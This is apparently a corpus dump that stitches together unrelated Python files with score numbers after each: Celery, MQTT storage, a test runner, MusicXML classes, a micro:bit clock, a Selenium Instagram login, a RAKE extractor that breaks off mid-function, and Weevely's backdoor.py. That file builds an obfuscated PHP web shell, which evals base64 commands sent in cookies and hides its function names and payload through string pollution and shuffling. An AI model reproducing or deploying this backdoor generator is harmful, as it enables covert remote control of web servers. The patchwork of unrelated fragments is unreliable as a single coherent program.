def parseCommandLine(argv):
"""
Parse the command line of this utility application.
This function uses the argparse package to handle the command line
arguments. In case of command line errors, the application will be
automatically terminated.
Parameters
------
argv: list of str
Arguments received from the command line.
Returns
------
object
Object with the parsed arguments as attributes (refer to the
documentation of the argparse package for details)
"""
parser = argparse.ArgumentParser(description='Tests the face and emotion '
'detector on a video file input.')
parser.add_argument('source', nargs='?', const='Yes',
choices=['video', 'cam'], default='cam',
help='Indicate the source of the input images for '
'the detectors: "video" for a video file or '
'"cam" for a webcam. The default is "cam".')
parser.add_argument('-f', '--file', metavar='<name>',
help='Name of the video file to use, if the source is '
'"video". The supported formats depend on the codecs '
'installed in the operating system.')
parser.add_argument('-i', '--id', metavar='<number>', default=0, type=int,
help='Numerical id of the webcam to use, if the source '
'is "cam". The default is 0.')
args = parser.parse_args()
if args.source == 'video' and args.file is None:
parser.error('-f is required when source is "video"')
return args
#---------------------------------------------
# namespace verification for invoking main
#---------------------------------------------
if __name__ == '__main__':
main(sys.argv[1:]) | 1.617188 | 2 |
konform/cmd.py | openanalytics/konform | 7 | 10840 | from . import Konform
def main():
Konform().run()
| 1.101563 | 1 |
ichnaea/taskapp/app.py | mikiec84/ichnaea | 348 | 10841 | """
Holds global celery application state and startup / shutdown handlers.
"""
from celery import Celery
from celery.app import app_or_default
from celery.signals import (
beat_init,
worker_process_init,
worker_process_shutdown,
setup_logging,
)
from ichnaea.log import configure_logging
from ichnaea.taskapp.config import (
configure_celery,
init_beat,
init_worker,
shutdown_worker,
)
@setup_logging.connect
def setup_logging_process(loglevel, logfile, format, colorize, **kwargs):
"""Called at scheduler and worker setup.
Configures logging using the same configuration as the webapp.
"""
configure_logging()
@beat_init.connect
def init_beat_process(signal, sender, **kw):
"""
Called automatically when `celery beat` is started.
Calls :func:`ichnaea.taskapp.config.init_beat`.
"""
celery_app = app_or_default()
init_beat(sender, celery_app)
@worker_process_init.connect
def init_worker_process(signal, sender, **kw):
"""
Called automatically when `celery worker` is started. This is executed
inside each forked worker process.
Calls :func:`ichnaea.taskapp.config.init_worker`.
"""
# get the app in the current worker process
celery_app = app_or_default()
init_worker(celery_app)
@worker_process_shutdown.connect
def shutdown_worker_process(signal, sender, **kw):
"""
Called automatically when `celery worker` is stopped. This is executed
inside each forked worker process.
Calls :func:`ichnaea.taskapp.config.shutdown_worker`.
"""
celery_app = app_or_default()
shutdown_worker(celery_app)
celery_app = Celery("ichnaea.taskapp.app")
configure_celery(celery_app)
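# Typical invocations (an illustrative sketch; exact flags depend on the
# deployment and the installed Celery version):
#
#   celery -A ichnaea.taskapp.app:celery_app worker   # fires the worker init/shutdown hooks above
#   celery -A ichnaea.taskapp.app:celery_app beat     # fires the beat_init hook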
| 2.390625 | 2 |
gmqtt/storage.py | sabuhish/gmqtt | 0 | 10842 | import asyncio
from typing import Tuple
import heapq
class BasePersistentStorage(object):
async def push_message(self, mid, raw_package):
raise NotImplementedError
def push_message_nowait(self, mid, raw_package) -> asyncio.Future:
try:
asyncio.get_event_loop()
except RuntimeError as err:
if "There is no current event loop in thread" in str(err):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
return asyncio.ensure_future(self.push_message(mid, raw_package))
async def pop_message(self) -> Tuple[int, bytes]:
raise NotImplementedError
async def remove_message_by_mid(self, mid):
raise NotImplementedError
@property
async def is_empty(self) -> bool:
raise NotImplementedError
class HeapPersistentStorage(BasePersistentStorage):
def __init__(self, timeout):
self._queue = []
self._timeout = timeout
async def push_message(self, mid, raw_package):
tm = asyncio.get_event_loop().time()
heapq.heappush(self._queue, (tm, mid, raw_package))
async def pop_message(self):
current_time = asyncio.get_event_loop().time()
(tm, mid, raw_package) = heapq.heappop(self._queue)
if current_time - tm > self._timeout:
return mid, raw_package
else:
heapq.heappush(self._queue, (tm, mid, raw_package))
return None
async def remove_message_by_mid(self, mid):
message = next(filter(lambda x: x[1] == mid, self._queue), None)
if message:
self._queue.remove(message)
heapq.heapify(self._queue)
@property
async def is_empty(self):
return not bool(self._queue)
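# Minimal usage sketch (illustrative only, not part of the public gmqtt API):
# a pushed message becomes eligible for pop_message() only once `timeout`
# seconds have passed; before that None is returned and the item is re-queued.
if __name__ == '__main__':
    async def _demo():
        storage = HeapPersistentStorage(timeout=0.1)
        await storage.push_message(1, b'\x30\x00')  # hypothetical mid and raw packet bytes
        print(await storage.pop_message())          # None: message is still too fresh
        await asyncio.sleep(0.2)
        print(await storage.pop_message())          # (1, b'0\x00') once the timeout has passed
    asyncio.run(_demo())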
| 2.625 | 3 |
test/testframework/runner.py | 5GExchange/escape | 10 | 10843 | # Copyright 2017 <NAME>, <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import importlib
import logging
import os
import sys
import threading
from collections import Iterable
import pexpect
import yaml
from yaml.error import YAMLError
log = logging.getLogger()
class Tee(object):
"""
Inspired by the bash command: tee
tee - read from standard input and write to standard output and files
"""
def __init__ (self, filename):
super(Tee, self).__init__()
self.file = open(filename, mode="w", buffering=0)
self.stdout = sys.stdout
sys.stdout = self
def __del__ (self):
sys.stdout = self.stdout
self.file.close()
def write (self, data):
self.file.write(data)
self.stdout.write(data)
def __enter__ (self):
return self
def __exit__ (self, exc_type, exc_val, exc_tb):
self.__del__()
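# Illustrative use of Tee (a sketch, not part of the framework API): while the
# context is active, everything printed to stdout is also written to the file.
#
#   with Tee('testrun.log'):
#     print('shown on the console and written to testrun.log')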
class EscapeRunResult():
"""
Container class for storing the result of the test run.
"""
def __init__ (self, output=None, exception=None):
self.log_output = output
self.exception = exception
def was_error (self):
return self.exception is not None
def __iter__ (self):
return iter(self.log_output)
class CommandRunner(object):
"""
  Main runner class which is capable of running the test script and killing the
  process explicitly or based on the timeout value.
"""
KILL_TIMEOUT = 60
def __init__ (self, cmd, cwd=None, kill_timeout=None, output_stream=None):
self._command = self.__evaluate_cmd(cmd)
self._cwd = cwd if cwd else os.path.dirname(__file__)
self.kill_timeout = kill_timeout if kill_timeout else self.KILL_TIMEOUT
self.output_stream = output_stream
self._process = None
self.__killed = False
def __str__ (self):
return "%s(cmd: %s, timeout: %s)" % (
self.__class__.__name__, self._command, self.kill_timeout)
@property
def is_killed (self):
return self.__killed
@property
def is_alive (self):
return self._process and self._process.isalive()
@staticmethod
def __evaluate_cmd (cmd):
"""
Split command to list for pexpect.
:param cmd: str or list
:rtype: list[str]
"""
if isinstance(cmd, basestring):
return cmd.split(' ')
elif isinstance(cmd, Iterable):
return list(cmd)
else:
return None
def execute (self):
"""
Create and start the process. Block until the process ends or timeout is
exceeded.
"""
try:
self._process = pexpect.spawn(self._command[0],
args=self._command[1:],
timeout=self.kill_timeout,
cwd=self._cwd,
logfile=self.output_stream)
self._process.expect(pexpect.EOF)
return self
except pexpect.TIMEOUT:
log.debug("Process running timeout(%ss) is exceeded!" % self.kill_timeout)
self.kill_process()
except pexpect.ExceptionPexpect as e:
log.error("Got unexpected error:\n%s" % e)
self.kill_process()
def kill_process (self):
"""
Kill the process and call the optional hook function.
"""
log.debug("Kill process...")
self.stop()
self.__killed = True
if self.is_alive:
self._process.terminate(force=True)
def stop (self):
"""
Stop the process.
:return: None
"""
log.debug("Terminate program under test: %s" % self)
if self._process:
self._process.sendcontrol('c')
if self.is_alive:
self._process.terminate()
def get_process_output_stream (self):
"""
:return: Return with the process buffer.
"""
return self._process.before if self._process.before else ""
def clone (self):
return copy.deepcopy(self)
def cleanup (self):
log.debug("Cleanup %s..." % self.__class__.__name__)
self._process = None
self.__killed = False
class ESCAPECommandRunner(CommandRunner):
"""
Extended CommandRunner class for ESCAPE.
Use threading.Event for signalling ESCAPE is up.
"""
ESC_PARAM_QUIT = "--quit"
ESC_PARAM_SERVICE = "--service"
def __init__ (self, *args, **kwargs):
super(ESCAPECommandRunner, self).__init__(*args, **kwargs)
self.__ready = threading.Event()
self.timeouted = False
@property
def timeout_exceeded (self):
return self.timeouted
def setup_verbose_logging (self):
log.debug("Detect VERBOSE mode --> Add more 'debug' flag")
self._command.extend(('--debug',) * 2)
def setup_standalone_mode (self):
log.debug("Detected standalone mode --> Disable timeout")
self.kill_timeout = None
log.debug("Remove quit mode, add ROS-API")
self._command.extend(("++quit", "--rosapi"))
def execute (self, wait_for_up=True):
"""
Create and start the process. Block until the process ends or timeout is
exceeded.
"""
log.debug("\nStart program under test...")
log.debug(self._command)
try:
self._process = pexpect.spawn(self._command[0],
args=self._command[1:],
timeout=self.kill_timeout,
cwd=self._cwd,
logfile=self.output_stream)
if wait_for_up:
self._process.expect(pattern="ESCAPEv2 is up")
self.__ready.set()
self._process.expect(pexpect.EOF)
return self
except pexpect.TIMEOUT:
log.debug("Process running timeout(%ss) is exceeded!" % self.kill_timeout)
self.kill_process()
self.timeouted = True
except pexpect.ExceptionPexpect as e:
log.error("Got unexpected error:\n%s" % e.message)
log.debug("\n\nError details:\n%s" % self._process.before)
self.kill_process()
def test (self, timeout=CommandRunner.KILL_TIMEOUT):
"""
Start a presumably simple process and test if the process is executed
successfully within the timeout interval or been killed.
:param timeout: use the given timeout instead of the default kill timeout
:type timeout: int
:return: the process is stopped successfully
:rtype: bool
"""
try:
proc = pexpect.spawn(self._command[0],
args=self._command[1:],
cwd=self._cwd,
timeout=timeout)
proc.expect(pexpect.EOF)
return True
except pexpect.ExceptionPexpect:
return False
def wait_for_ready (self):
log.debug("Waiting for ESCAPE...")
self.__ready.wait(timeout=self.kill_timeout)
log.debug("ESCAPE is up! ")
def kill_process (self):
# Call super explicitly because _process is defined in the parent class
# so from child class process cannot be terminated
super(ESCAPECommandRunner, self).kill_process()
def stop (self):
# Call super explicitly because _process is defined in the parent class
# so from child class process cannot be terminated
super(ESCAPECommandRunner, self).stop()
def reset(self):
log.debug("Reset %s status..." % self.__class__.__name__)
self.timeouted = False
self.__ready.clear()
class RunnableTestCaseInfo(object):
"""
Container class for storing the relevant information and config values of a
test case.
"""
CONFIG_FILE_NAME = "test-config.yaml"
CONFIG_CONTAINER_NAME = "test"
RUNNER_SCRIPT_NAME = "run.sh"
README_FILE_NAME = "README.txt"
def __init__ (self, case_path):
# Removing trailing slash
self.__case_path = os.path.normpath(case_path)
self.sub_name = None
log.debug("Reading testcase cfg from: %s" % self.full_testcase_path)
@property
def testcase_dir_name (self):
"""
:return: directory name of the test case
:rtype: str
"""
return os.path.basename(self.__case_path)
@property
def name (self):
if self.sub_name is not None:
return "%s-%s" % (self.testcase_dir_name, self.sub_name)
else:
return self.testcase_dir_name
@property
def full_testcase_path (self):
"""
:return: absolute path of the test case directory.
:rtype: str
"""
return self.__case_path
@property
def test_command (self):
"""
:return: absolute command path of the test case runner script.
:rtype: str
"""
return os.path.join(self.full_testcase_path,
self.RUNNER_SCRIPT_NAME)
@property
def config_file_name (self):
"""
:return: absolute path of the test case config file.
:rtype: str
"""
return os.path.join(self.full_testcase_path,
self.CONFIG_FILE_NAME)
def readme (self):
"""
:return: load the README file
:rtype: str
"""
with open(os.path.join(self.full_testcase_path,
self.README_FILE_NAME)) as f:
readme = f.read()
return readme if readme else ""
def load_test_case_class (self):
"""
:return: Return the TestCase class and it's parameters defined in the
test case config file
:rtype: tuple(object, dict)
"""
test_args = {}
try:
with open(self.config_file_name, 'r') as f:
config = yaml.safe_load(f)
except (IOError, YAMLError) as e:
log.error("Failed to load configuration file: %s" % e)
return None
if self.CONFIG_CONTAINER_NAME in config:
test_args = copy.copy(config[self.CONFIG_CONTAINER_NAME])
try:
m = test_args.pop('module')
c = test_args.pop('class')
return getattr(importlib.import_module(m), c), test_args
except (KeyError, ImportError):
pass
return None, test_args
def load_config (self):
try:
with open(self.config_file_name, 'r') as f:
config = yaml.safe_load(f)
except (IOError, YAMLError) as e:
log.error("Failed to load configuration file: %s" % e)
return None
try:
test_args = copy.copy(config[self.CONFIG_CONTAINER_NAME])
return test_args
except KeyError:
pass
return None
def __repr__ (self):
return "RunnableTestCase [%s]" % self.testcase_dir_name
def clone (self):
return copy.deepcopy(self)
| 2.28125 | 2 |
Calliope/13 Clock/Clock.py | frankyhub/Python | 0 | 10844 | from microbit import *
hands = Image.ALL_CLOCKS
#A centre dot of brightness 2.
ticker_image = Image("2\n").crop(-2,-2,5,5)
#Adjust these to taste
MINUTE_BRIGHT = 0.1111
HOUR_BRIGHT = 0.55555
#Generate hands for 5 minute intervals
def fiveticks():
fivemins = 0
hours = 0
while True:
yield hands[fivemins]*MINUTE_BRIGHT + hands[hours]*HOUR_BRIGHT
fivemins = (fivemins+1)%12
hours = (hours + (fivemins == 0))%12
#Generate hands with ticker superimposed for 1 minute intervals.
def ticks():
on = True
for face in fiveticks():
for i in range(5):
if on:
yield face + ticker_image
else:
yield face - ticker_image
on = not on
#Run a clock speeded up 60 times, so we can watch the animation.
for tick in ticks():
display.show(tick)
sleep(200) | 3.265625 | 3 |
home/kakadu31/sabertooth.py | rv8flyboy/pyrobotlab | 63 | 10845 | #Variables
#Working with build 2234
saberPort = "/dev/ttyUSB0"
#Initializing Motorcontroller
saber = Runtime.start("saber", "Sabertooth")
saber.connect(saberPort)
sleep(1)
#Initializing Joystick
joystick = Runtime.start("joystick","Joystick")
print(joystick.getControllers())
python.subscribe("joystick","publishJoystickInput")
joystick.setController(0)
for x in range(0,100):
print("power", x)
saber.driveForwardMotor1(x)
sleep(0.5)
for x in range(100,-1,-1):
print("power", x)
saber.driveForwardMotor1(x)
sleep(0.5)
| 2.578125 | 3 |
Dangerous/Weevely/core/backdoor.py | JeyZeta/Dangerous- | 0 | 10846 | <filename>Dangerous/Weevely/core/backdoor.py<gh_stars>0
# -*- coding: utf-8 -*-
# This file is part of Weevely NG.
#
# Copyright(c) 2011-2012 Weevely Developers
# http://code.google.com/p/weevely/
#
# This file may be licensed under the terms of of the
# GNU General Public License Version 2 (the ``GPL'').
#
# Software distributed under the License is distributed
# on an ``AS IS'' basis, WITHOUT WARRANTY OF ANY KIND, either
# express or implied. See the GPL for the specific language
# governing rights and limitations.
#
# You should have received a copy of the GPL along with this
# program. If not, go to http://www.gnu.org/licenses/gpl.html
# or write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
import base64, codecs
from random import random, randrange, choice, shuffle
from pollution import pollute_with_static_str
from core.utils import randstr
from core.moduleexception import ModuleException
from string import Template, ascii_letters, digits
PERMITTED_CHARS = ascii_letters + digits + '_.~'
WARN_SHORT_PWD = 'Invalid password, use words longer than 3 characters'
WARN_CHARS = 'Invalid password, password permitted chars are \'%s\'' % PERMITTED_CHARS
class BdTemplate(Template):
delimiter = '%'
class Backdoor:
payload_template= """
$c='count';
$a=$_COOKIE;
if(reset($a)=='%STARTKEY' && $c($a)>3){
$k='%ENDKEY';
echo '<'.$k.'>';
eval(base64_decode(preg_replace(array('/[^\w=\s]/','/\s/'), array('','+'), join(array_slice($a,$c($a)-3)))));
echo '</'.$k.'>';
}
"""
backdoor_template = """<?php
$%PAY_VAR1="%PAY1";
$%PAY_VAR2="%PAY2";
$%PAY_VAR3="%PAY3";
$%PAY_VAR4="%PAY4";
$%REPL_FUNC = str_replace("%REPL_POLL","","%REPL_ENC");
$%B64_FUNC = $%REPL_FUNC("%B64_POLL", "", "%B64_ENC");
$%CREAT_FUNC = $%REPL_FUNC("%CREAT_POLL","","%CREAT_ENC");
$%FINAL_FUNC = $%CREAT_FUNC('', $%B64_FUNC($%REPL_FUNC("%PAY_POLL", "", $%PAY_VAR1.$%PAY_VAR2.$%PAY_VAR3.$%PAY_VAR4))); $%FINAL_FUNC();
?>"""
def __init__( self, password ):
self.__check_pwd(password)
self.password = password
self.start_key = self.password[:2]
self.end_key = self.password[2:]
self.payload = BdTemplate(self.payload_template).substitute(STARTKEY = self.start_key, ENDKEY = self.end_key).replace( '\n', '' )
self.backdoor = self.encode_template()
def __str__( self ):
return self.backdoor
def __check_pwd(self, password):
if len(password)<4:
raise ModuleException('generate','\'%s\' %s' % (password, WARN_SHORT_PWD))
if ''.join(c for c in password if c not in PERMITTED_CHARS):
raise ModuleException('generate','\'%s\' %s' % (password, WARN_CHARS))
def encode_template(self):
b64_new_func_name = randstr()
b64_pollution, b64_polluted = pollute_with_static_str('base64_decode',frequency=0.7)
createfunc_name = randstr()
createfunc_pollution, createfunc_polluted = pollute_with_static_str('create_function',frequency=0.7)
payload_var = [ randstr() for st in range(4) ]
payload_pollution, payload_polluted = pollute_with_static_str(base64.b64encode(self.payload))
replace_new_func_name = randstr()
repl_pollution, repl_polluted = pollute_with_static_str('str_replace',frequency=0.7)
final_func_name = randstr()
length = len(payload_polluted)
offset = 7
piece1 = length / 4 + randrange(-offset,+offset)
piece2 = length / 2 + randrange(-offset,+offset)
piece3 = length*3/4 + randrange(-offset,+offset)
ts_splitted = self.backdoor_template.splitlines()
ts_shuffled = ts_splitted[1:6]
shuffle(ts_shuffled)
ts_splitted = [ts_splitted[0]] + ts_shuffled + ts_splitted[6:]
self.backdoor_template = '\n'.join(ts_splitted)
return BdTemplate(self.backdoor_template).substitute(
B64_FUNC = b64_new_func_name,
B64_ENC = b64_polluted,
B64_POLL = b64_pollution,
CREAT_FUNC = createfunc_name,
CREAT_ENC = createfunc_polluted,
CREAT_POLL = createfunc_pollution,
REPL_FUNC = replace_new_func_name,
REPL_ENC = repl_polluted,
REPL_POLL = repl_pollution,
PAY_VAR1 = payload_var[0],
PAY_VAR2 = payload_var[1],
PAY_VAR3 = payload_var[2],
PAY_VAR4 = payload_var[3],
PAY_POLL = payload_pollution,
PAY1 = payload_polluted[:piece1],
PAY2 = payload_polluted[piece1:piece2],
PAY3 = payload_polluted[piece2:piece3],
PAY4 = payload_polluted[piece3:],
FINAL_FUNC = final_func_name)
| 2.109375 | 2 |
musicscore/musicxml/types/complextypes/notations.py | alexgorji/music_score | 2 | 10847 | <filename>musicscore/musicxml/types/complextypes/notations.py
from musicscore.dtd.dtd import Sequence, GroupReference, Choice, Element
from musicscore.musicxml.attributes.optional_unique_id import OptionalUniqueId
from musicscore.musicxml.attributes.printobject import PrintObject
from musicscore.musicxml.groups.common import Editorial
from musicscore.musicxml.elements.xml_element import XMLElement
from musicscore.musicxml.types.complextypes.arpeggiate import ComplexTypeArpeggiate
from musicscore.musicxml.types.complextypes.articulations import ComplexTypeArticulations
from musicscore.musicxml.types.complextypes.complextype import ComplexType
from musicscore.musicxml.types.complextypes.dynamics import Dynamics
from musicscore.musicxml.types.complextypes.fermata import ComplexTypeFermata
from musicscore.musicxml.types.complextypes.ornaments import ComplexTypeOrnaments
from musicscore.musicxml.types.complextypes.slide import ComplexTypeSlide
from musicscore.musicxml.types.complextypes.slur import ComplexTypeSlur
from musicscore.musicxml.types.complextypes.technical import ComplexTypeTechnical
from musicscore.musicxml.types.complextypes.tied import ComplexTypeTied
from musicscore.musicxml.types.complextypes.tuplet import ComplexTypeTuplet
class Tied(ComplexTypeTied):
""""""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
class Slur(ComplexTypeSlur):
_TAG = 'slur'
def __init__(self, type, *args, **kwargs):
super().__init__(tag=self._TAG, type=type, *args, **kwargs)
class Tuplet(ComplexTypeTuplet):
""""""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
class Glissando(XMLElement):
""""""
def __init__(self, value, *args, **kwargs):
super().__init__(tag='glissando', value=value, *args, **kwargs)
raise NotImplementedError()
class Slide(ComplexTypeSlide):
""""""
_TAG = 'slide'
def __init__(self, type, *args, **kwargs):
super().__init__(tag=self._TAG, type=type, *args, **kwargs)
class Ornaments(ComplexTypeOrnaments):
""""""
_TAG = 'ornaments'
def __init__(self, *args, **kwargs):
super().__init__(tag=self._TAG, *args, **kwargs)
class Technical(ComplexTypeTechnical):
""""""
_TAG = 'technical'
def __init__(self, *args, **kwargs):
super().__init__(tag=self._TAG, *args, **kwargs)
class Articulations(ComplexTypeArticulations):
""""""
_TAG = 'articulations'
def __init__(self, *args, **kwargs):
super().__init__(tag=self._TAG, *args, **kwargs)
class Fermata(ComplexTypeFermata):
""""""
_TAG = 'fermata'
def __init__(self, value='normal', *args, **kwargs):
super().__init__(tag=self._TAG, value=value, *args, **kwargs)
class Arpeggiate(ComplexTypeArpeggiate):
""""""
_TAG = 'arpeggiate'
def __init__(self, *args, **kwargs):
super().__init__(tag=self._TAG, *args, **kwargs)
class NonArpeggiate(XMLElement):
""""""
def __init__(self, value, *args, **kwargs):
super().__init__(tag='non-arpeggiate', value=value, *args, **kwargs)
raise NotImplementedError()
class AccidentalMark(XMLElement):
""""""
def __init__(self, value, *args, **kwargs):
super().__init__(tag='accidental-mark', value=value, *args, **kwargs)
raise NotImplementedError()
class OtherNotation(XMLElement):
""""""
def __init__(self, value, *args, **kwargs):
super().__init__(tag='other-notation', value=value, *args, **kwargs)
raise NotImplementedError()
class ComplexTypeNotations(ComplexType, PrintObject, OptionalUniqueId):
"""
Notations refer to musical notations, not XML notations. Multiple notations are allowed in order to represent
multiple editorial levels. The print-object attribute, added in Version 3.0, allows notations to represent details
of performance technique, such as fingerings, without having them appear in the score.
"""
_DTD = Sequence(
GroupReference(Editorial),
Choice(
Element(Tied),
Element(Slur),
Element(Tuplet),
Element(Glissando),
Element(Slide),
Element(Ornaments),
Element(Technical),
Element(Articulations),
Element(Dynamics),
Element(Fermata),
Element(Arpeggiate),
Element(NonArpeggiate),
Element(AccidentalMark),
Element(OtherNotation),
min_occurrence=0,
max_occurrence=None
)
)
def __init__(self, *args, **kwargs):
super().__init__(tag='notations', *args, **kwargs)
| 2.0625 | 2 |
src/constants.py | MitraSeifari/pystackoverflow | 0 | 10848 | <gh_stars>0
from types import SimpleNamespace
from src.utils.keyboard import create_keyboard
keys = SimpleNamespace(
settings=':gear: Settings',
cancel=':cross_mark: Cancel',
back=':arrow_left: Back',
next=':arrow_right: Next',
add=':heavy_plus_sign: Add',
edit=':pencil: Edit',
save=':check_mark_button: Save',
delete=':wastebasket: Delete',
yes=':white_check_mark: Yes',
    no=':negative_squared_cross_mark: No',
ask_question=':red_question_mark: Ask a question',
send_question=':envelope_with_arrow: Send question',
)
keyboards = SimpleNamespace(
main=create_keyboard(keys.ask_question, keys.settings),
ask_question=create_keyboard(keys.cancel, keys.send_question),
)
states = SimpleNamespace(
main='MAIN',
ask_question='ASK_QUESTION'
)
| 2.65625 | 3 |
iirsBenchmark/exceptions.py | gAldeia/iirsBenchmark | 0 | 10849 | <reponame>gAldeia/iirsBenchmark
# Author: <NAME>
# Contact: <EMAIL>
# Version: 1.0.0
# Last modified: 08-20-2021 by <NAME>
"""
Simple exception that is raised by explainers when they don't support local
or global explanations, or when they are not model agnostic. This should be
catched and handled in the experiments.
"""
class NotApplicableException(Exception):
def __init__(self, message=""):
self.message = message | 2.09375 | 2 |
covid_data_tracker/util.py | granularai/gh5050_covid_data_tracker | 0 | 10850 | import click
from covid_data_tracker.registry import PluginRegistry
def plugin_selector(selected_country: str):
"""plugin selector uses COUNTRY_MAP to find the appropriate plugin
for a given country.
Parameters
----------
selected_country : str
specify the country of interest.
Returns
-------
covid_data_tracker.plugins.BasePlugin
More appropriately, returns an instance of a country-specific
subclass of BasePlugin.
"""
if selected_country in PluginRegistry.keys():
klass = PluginRegistry[selected_country]
instance = klass()
    else:
        click.echo('No country plugin available')
        raise AttributeError
return instance
def country_downloader(country: str):
"""Finds country plugin, fetches data, and downloads
to csv with click alerts.
Parameters
----------
country : str
Name of country
Returns
-------
NoneType
"""
click.echo(f"selecting plugin for {country}")
country_plugin = plugin_selector(country)
click.echo(f"attempting to find available data for {country}")
country_plugin.fetch()
click.echo(f"downloading available data for {country}")
country_plugin.check_instance_attributes()
country_plugin.download()
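# Illustrative usage (a sketch; assumes at least one country plugin has been
# registered in PluginRegistry by the package's plugin modules):
if __name__ == '__main__':
    print('Registered country plugins:', list(PluginRegistry.keys()))
    for registered_country in PluginRegistry.keys():
        country_downloader(registered_country)
        break  # fetch and download data for the first registered country only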
| 3.125 | 3 |
dev/libs.py | karimwitani/webscraping | 0 | 10851 | <filename>dev/libs.py
import selenium
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException
def browser_init():
option = webdriver.ChromeOptions()
browser = webdriver.Chrome(executable_path='/Library/Application Support/Google/chromedriver', chrome_options=option)
return browser
def insta_login(browser):
browser.get('https://www.instagram.com')
#Find username/pass fields
username = WebDriverWait(browser,10).until(EC.element_to_be_clickable((By.XPATH, '//input[@name="username"]')))
password = WebDriverWait(browser,10).until(EC.element_to_be_clickable((By.XPATH, '//input[@name="password"]')))
#input username and pass
username.clear()
username.send_keys('itanikarim')
password.clear()
password.send_keys('<PASSWORD>')
#Login
Login_button = WebDriverWait(browser, 2).until(EC.element_to_be_clickable((By.XPATH, '//*[@id="loginForm"]/div/div[3]'))).click()
#Skip buttons
not_now = WebDriverWait(browser, 10).until(EC.element_to_be_clickable((By.XPATH, '//button[contains(text(), "Not Now")]'))).click()
not_now2 = WebDriverWait(browser, 10).until(EC.element_to_be_clickable((By.XPATH, '//button[contains(text(), "Not Now")]'))).click()
print("everything ok") | 2.90625 | 3 |
setup.py | dwastberg/osmuf | 0 | 10852 | from setuptools import setup
setup(name='osmuf',
version='0.1',
install_requires=[
"seaborn",
],
description='Urban Form analysis from OpenStreetMap',
url='http://github.com/atelierlibre/osmuf',
author='AtelierLibre',
author_email='<EMAIL>',
license='MIT',
packages=['osmuf'],
zip_safe=False)
| 1.070313 | 1 |
tests/test_model.py | artemudovyk/django-updown | 41 | 10853 | <filename>tests/test_model.py
# -*- coding: utf-8 -*-
"""
tests.test_model
~~~~~~~~~~~~~~~~
Tests the models provided by the updown rating app
:copyright: 2016, weluse (https://weluse.de)
:author: 2016, <NAME> <<EMAIL>>
:license: BSD, see LICENSE for more details.
"""
from __future__ import unicode_literals
import random
from django.test import TestCase
from django.contrib.auth.models import User
from updown.models import SCORE_TYPES
from updown.exceptions import CannotChangeVote
from tests.models import RatingTestModel
class TestRatingModel(TestCase):
"""Test case for the generic rating app"""
def setUp(self):
self.instance = RatingTestModel.objects.create()
self.user = User.objects.create(
username=str(random.randint(0, 100000000))
)
self.user2 = User.objects.create(
username=str(random.randint(0, 100000000))
)
def test_basic_vote(self):
"""Test a simple vote"""
self.instance.rating.add(SCORE_TYPES['LIKE'], self.user,
'192.168.0.1')
self.assertEquals(self.instance.rating_likes, 1)
def test_change_vote(self):
self.instance.rating.add(SCORE_TYPES['LIKE'], self.user,
'192.168.0.1')
self.instance.rating.add(SCORE_TYPES['DISLIKE'], self.user,
'192.168.0.1')
self.assertEquals(self.instance.rating_likes, 0)
self.assertEquals(self.instance.rating_dislikes, 1)
def test_change_vote_disallowed(self):
self.instance.rating2.add(SCORE_TYPES['LIKE'], self.user,
'192.168.0.1')
self.assertRaises(CannotChangeVote, self.instance.rating2.add,
SCORE_TYPES['DISLIKE'], self.user, '192.168.0.1')
| 2.578125 | 3 |
nlptk/ratings/rake/rake.py | GarryGaller/nlp_toolkit | 0 | 10854 | <reponame>GarryGaller/nlp_toolkit
import sys,os
from typing import List
from collections import defaultdict, Counter
from itertools import groupby, chain, product
import heapq
from pprint import pprint
import string
class Rake():
def __init__(
self,
text:List[List[str]],
stopwords=[],
max_words=100,
min_chars=3
):
self.text = text
self.stopwords = stopwords
self.blacklist = set(chain(stopwords, string.punctuation))
self._phrases = set()
        # Frequency (freq(w)) is defined as the number of phrases
        # that contain the word in question
self.freq = Counter()
        # Degree (deg(w)) is defined as the total number of words
        # in the phrases that contain the word.
self.degree = Counter()
        # The weight of a word is the ratio of its degree to its frequency:
        # s(w) = deg(w)/freq(w)
self.token_weights = Counter()
self.phrase_scores = Counter()
self.min_chars = min_chars
self.max_words = max_words
self._generate_phrases()
self._calc_frequencies()
self._calc_weights()
self._calc_scores()
def _generate_phrases(self):
'''Create contender phrases from sentences.'''
for sent in self.text:
self._phrases.update(self._get_phrase_list(sent))
def _get_phrase_list(self,sent):
'''Grouping the left words into phrases'''
groups = groupby(sent, lambda x: x not in self.blacklist)
phrases = [tuple(group[1]) for group in groups if group[0]]
result = []
for phrase in phrases:
if (
phrase
and len(' '.join(phrase)) >= self.min_chars
and len(phrase) <= self.max_words
):
result.append(phrase)
#print('_get_phrase_list')
#pprint(result)
return result
def _calc_frequencies(self):
'''Calculation of frequencies of words'''
for phrase in self._phrases:
for token in phrase:
self.freq[token] += 1
                self.degree[token] += len(phrase) - 1  # some RAKE variants do not subtract 1 here
        # not every RAKE example adds the word frequency to its degree
for token in self.freq:
self.degree[token] += self.freq[token]
def _calc_frequencies2(self):
self.freq = Counter(chain.from_iterable(self._phrases))
def build_occurance_graph():
graph = defaultdict(lambda: defaultdict(int))
for phrase in self._phrases:
            # For each phrase in the phrase list, count co-occurrences of the
# word with other words in the phrase.
#
            # Note: Keep the co-occurrences graph as is, to help facilitate its
# use in other creative ways if required later.
for (word, coword) in product(phrase, phrase):
graph[word][coword] += 1
return graph
graph = build_occurance_graph()
self.degree = defaultdict(int)
for token in graph:
self.degree[token] = sum(graph[token].values())
pprint(graph )
def _calc_weights(self):
        # word weights: s(w) = deg(w)/freq(w)
for token in self.freq:
score = self.degree[token] / (self.freq[token] * 1.0)
self.token_weights[token] += score
def _calc_scores(self):
for phrase in self._phrases:
#print(phrase,self._phrases.count(phrase))
score = sum(self.token_weights.get(token,0) for token in phrase)
